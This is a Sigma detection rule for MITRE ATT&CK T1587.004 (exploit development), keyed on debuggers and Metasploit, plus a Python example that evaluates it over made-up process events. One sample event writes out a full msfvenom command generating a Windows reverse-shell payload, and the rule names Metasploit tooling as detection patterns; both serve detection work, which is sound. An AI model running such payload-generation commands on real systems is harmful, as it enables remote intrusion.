title: Exploits (T1587.004)
id: df00tech-t1587-004
status: experimental
description: >-
  Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability
  to cause unintended or unanticipated behavior on computer hardware or software. Rather than finding and modifying
  public exploits or purchasing them from exploit vendors, an adversary may develop their own. Adversaries may use
  information acquired via Vulnerabilities (T1588.006) to focus exploit development, and may uncover exploitable
  vulnerabilities along the way through methods such as fuzzing and patch analysis. Documented threat actors using this
  technique include Volt Typhoon (zero-day initial access), UNC3886 (CVE-2022-41328 in FortiOS and CVE-2023-34048 in
  VMware vCenter), and Leviathan, which rapidly adapts public PoC code for new vulnerabilities. Because this is a PRE
  technique, the adversary action (exploit development) normally occurs outside the target environment; the rule cannot
  observe it directly. Detection therefore focuses on exploit development tooling (debuggers, Metasploit payload
  generation) appearing on monitored endpoints, downstream exploitation artifacts, and fuzzing activity against
  internal services.
references:
  - https://attack.mitre.org/techniques/T1587/004/
  - https://df00tech.com/detections/T1587.004
author: df00tech
date: 2026/04/13
tags:
  - attack.t1587.004
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # Approximation of the df00tech KQL/SPL query for the Sigma backend: keys on the
  # exploit-development tooling this rule is scoped to (the debuggers and Metasploit
  # components named under falsepositives). Adjust the image list to your estate.
  selection_debugger:
    Image|endswith:
      - '\windbg.exe'
      - '\windbgx.exe'
      - '\x64dbg.exe'
      - '\x32dbg.exe'
  selection_metasploit:
    CommandLine|contains:
      - 'msfvenom'
      - 'msfconsole'
  condition: 1 of selection_*
falsepositives:
  - Authorized red team and penetration testers running these tools as part of a sanctioned engagement; cross-reference against your security testing register and approved device list
  - Software developers using WinDbg or x64dbg for legitimate application debugging and crash analysis on developer workstations
  - Security engineers building and testing detection rules using Metasploit or msfvenom against isolated lab environments
  - CTF (Capture The Flag) participants or security training students running exploit development labs on endpoints enrolled in the tenant
  - Security operations tooling (SIEM content development, detection validation) that invokes these tools programmatically in a controlled manner
level: high
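The following is an added example, not part of the df00tech rule or its query. It evaluates the same kind of selection the rule expresses (debugger image names, Metasploit command-line markers) over constructed Windows process_creation events, and applies the security-testing-register cross-reference suggested under falsepositives. The host names, the approved-host set and the sample events are all made up for the demonstration.

```python
"""Evaluate a T1587.004-style process_creation selection over sample events.

Field names follow Sigma's process_creation category (Image, CommandLine,
ComputerName). The approved-host set stands in for an organisation's
security testing register and is hypothetical.
"""

# Sigma-style selection: each entry is field|modifier -> list of values.
# A selection matches when every field in it matches; the rule condition is
# "1 of selection_*", i.e. OR across the selections.
SELECTIONS = {
    "selection_debugger": {
        "Image|endswith": ["\\windbg.exe", "\\windbgx.exe", "\\x64dbg.exe", "\\x32dbg.exe"],
    },
    "selection_metasploit": {
        "CommandLine|contains": ["msfvenom", "msfconsole"],
    },
}

# Hypothetical testing register: endpoints approved for exploit-development work.
APPROVED_HOSTS = {"REDTEAM-WS01", "DEV-DBG-LAB"}


def field_matches(event, spec, values):
    """Apply one Sigma field spec (field or field|modifier) to an event."""
    field, _, modifier = spec.partition("|")
    actual = str(event.get(field, "")).lower()
    for value in values:
        v = value.lower()
        if modifier == "endswith" and actual.endswith(v):
            return True
        if modifier == "contains" and v in actual:
            return True
        if modifier == "" and actual == v:
            return True
    return False


def matched_selections(event):
    """Names of selections whose every field spec matches the event."""
    return [
        name
        for name, fields in SELECTIONS.items()
        if all(field_matches(event, spec, vals) for spec, vals in fields.items())
    ]


def classify(event):
    """'alert', 'suppressed' (approved host per the register), or None (no match)."""
    if not matched_selections(event):
        return None
    if event.get("ComputerName", "").upper() in APPROVED_HOSTS:
        return "suppressed"
    return "alert"


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Developer workstation not in the register: alerts, triage as possible FP.
        "ComputerName": "DEV-WS17",
        "Image": r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe",
        "CommandLine": r"windbg.exe -z C:\dumps\app.dmp",
    },
    {   # Sanctioned red-team host: matches but is suppressed by the register.
        "ComputerName": "REDTEAM-WS01",
        "Image": r"C:\Tools\x64dbg\release\x64\x64dbg.exe",
        "CommandLine": r"x64dbg.exe C:\Tools\target.exe",
    },
    {   # Payload generation via the Ruby interpreter: caught by the CommandLine marker.
        "ComputerName": "FIN-WS03",
        "Image": r"C:\metasploit\ruby\bin\ruby.exe",
        "CommandLine": "ruby.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe",
    },
    {   # Benign process: no selection matches.
        "ComputerName": "FIN-WS03",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
    },
]


def run(events=SAMPLE_EVENTS):
    """Return (host, image basename, verdict) for each event."""
    return [(e["ComputerName"], e["Image"].rsplit("\\", 1)[-1], classify(e)) for e in events]


if __name__ == "__main__":
    for host, image, verdict in run():
        print(f"{host:<13} {image:<12} {verdict}")
```

The register check is deliberately applied after the match rather than folded into the selection, so suppressed events are still visible for audit (a sanctioned host running these tools outside an engagement window is itself worth a look).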
